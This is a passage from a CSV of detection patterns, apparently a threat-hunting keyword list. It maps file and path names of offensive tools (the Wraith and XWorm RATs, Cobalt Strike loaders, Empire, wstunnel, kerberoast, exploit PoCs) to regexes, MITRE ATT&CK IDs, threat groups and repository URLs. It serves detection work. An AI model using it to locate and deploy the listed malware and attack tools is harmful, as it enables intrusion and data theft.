(C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-master.zip*",".{0,1000}\/wraith\-master\.zip.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-RAT-payloads*",".{0,1000}\/wraith\-RAT\-payloads.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-RAT-payloads.git*",".{0,1000}\/wraith\-RAT\-payloads\.git.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-server.py*",".{0,1000}\/wraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wraith-server_v*.py*",".{0,1000}\/wraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*/wsdd-discover.nse*",".{0,1000}\/wsdd\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ws-dirs.txt*",".{0,1000}\/ws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/ws-files.txt*",".{0,1000}\/ws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/WSPCoerce.git*",".{0,1000}\/WSPCoerce\.git.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*/wstunnel wstunnel*",".{0,1000}\/wstunnel\swstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wstunnel.exe",".{0,1000}\/wstunnel\.exe","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wstunnel.git*",".{0,1000}\/wstunnel\.git.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wstunnel/certs/*",".{0,1000}\/wstunnel\/certs\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wstunnel:latest*",".{0,1000}\/wstunnel\:latest.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*/wwlib/lolbins/*",".{0,1000}\/wwlib\/lolbins\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*/www/exploit.html*",".{0,1000}\/www\/exploit\.html.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","392","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*/x0rz/*",".{0,1000}\/x0rz\/.{0,1000}","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/x0rz","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/x11-access.nse*",".{0,1000}\/x11\-access\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/x64/Stardust.asm*",".{0,1000}\/x64\/Stardust\.asm.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*/x64_slim.dll*",".{0,1000}\/x64_slim\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/xan7r/kerberoast*",".{0,1000}\/xan7r\/kerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*/xar-1.5.2.tar.gz*",".{0,1000}\/xar\-1\.5\.2\.tar\.gz.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/xdmcp-discover.nse*",".{0,1000}\/xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xen-mimi.ps1*",".{0,1000}\/xen\-mimi\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*/xeno-rat.git*",".{0,1000}\/xeno\-rat\.git.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*/XHVNC.exe*",".{0,1000}\/XHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/xml_attack.txt*",".{0,1000}\/xml_attack\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xml_attacks.txt*",".{0,1000}\/xml_attacks\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xmlrpc-methods.nse*",".{0,1000}\/xmlrpc\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xmpp-brute.nse*",".{0,1000}\/xmpp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xmpp-info.nse*",".{0,1000}\/xmpp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xndpxs/CVE-2022-0847*",".{0,1000}\/xndpxs\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/xndpxs/CVE-2022-0847","1","1","N/A","N/A","1","9","7","2022-03-07T17:59:12Z","2022-03-07T17:51:02Z" "*/xor/stager.txt*",".{0,1000}\/xor\/stager\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*/xor/xor.go*",".{0,1000}\/xor\/xor\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*/XOR_b64_encrypted/*",".{0,1000}\/XOR_b64_encrypted\/.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*/XorObfuscation.cs*",".{0,1000}\/XorObfuscation\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/xpath_injection.txt*",".{0,1000}\/xpath_injection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/xPipe/*",".{0,1000}\/xPipe\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","78","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" "*/XRulez binaries.zip*",".{0,1000}\/XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*/XRulez.exe*",".{0,1000}\/XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*/XRulez.zip*",".{0,1000}\/XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*/xss_robertux.txt*",".{0,1000}\/xss_robertux\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/XWorm.exe*",".{0,1000}\/XWorm\.exe.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","1","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*/XWorm.exe*",".{0,1000}\/XWorm\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/XWorm.rar*",".{0,1000}\/XWorm\.rar.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*/XWorm.zip*",".{0,1000}\/XWorm\.zip.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/XWorm-RAT-V*",".{0,1000}\/XWorm\-RAT\-V.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*/xxe_fuzz.txt*",".{0,1000}\/xxe_fuzz\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/yanghaoi/_CNA*",".{0,1000}\/yanghaoi\/_CNA.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 